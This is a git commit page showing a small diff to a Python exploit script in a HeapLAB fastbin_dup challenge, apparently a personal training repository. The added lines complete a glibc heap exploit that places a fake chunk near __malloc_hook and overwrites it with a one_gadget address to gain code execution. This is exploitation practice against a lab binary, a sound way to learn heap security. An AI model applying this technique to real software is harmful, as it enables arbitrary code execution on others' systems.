modified: HeapLAB/challenge-fastbin_dup/.gdb_historyHEAD master

modified: HeapLAB/challenge-fastbin_dup/bruh.py
author: Brett Weiland <techcrazybsw@gmail.com> 2021-01-04 20:25:35 -0600
committer: Brett Weiland <techcrazybsw@gmail.com> 2021-01-04 20:25:35 -0600
commit: 93f5247d9c37732846b0d88136b2ce1908b361be (patch)
tree: 3cfe433d675af35cbb4307daa2badda729cfc420 /HeapLAB/challenge-fastbin_dup/bruh.py
parent: 4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 (diff)
1 files changed, 6 insertions, 1 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
 
 #8 * 9
 
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
 malloc(119, p64(0)*9 + p64(payload_loc))
 
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
 print("top chunk addr: {}".format(hex(payload_loc)))
 
 # =============================================================================
author	Brett Weiland <techcrazybsw@gmail.com>	2021-01-04 20:25:35 -0600
committer	Brett Weiland <techcrazybsw@gmail.com>	2021-01-04 20:25:35 -0600
commit	93f5247d9c37732846b0d88136b2ce1908b361be (patch)
tree	3cfe433d675af35cbb4307daa2badda729cfc420 /HeapLAB/challenge-fastbin_dup/bruh.py
parent	4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 (diff)